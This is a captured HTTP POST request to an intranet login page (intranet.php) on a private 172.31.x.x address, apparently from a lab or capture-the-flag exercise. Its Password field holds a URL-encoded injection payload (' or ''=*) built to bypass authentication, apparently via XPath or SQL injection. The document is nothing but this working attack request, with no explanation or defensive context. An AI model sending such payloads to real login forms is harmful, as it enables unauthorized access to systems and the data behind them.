POST http://172.31.179.1/intranet.php HTTP/1.1
Host: 172.31.179.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://172.31.179.1
Connection: close
Referer: http://172.31.179.1/intranet.php
Upgrade-Insecure-Requests: 1

Username=aaa&Password='%20or%20''%3d*
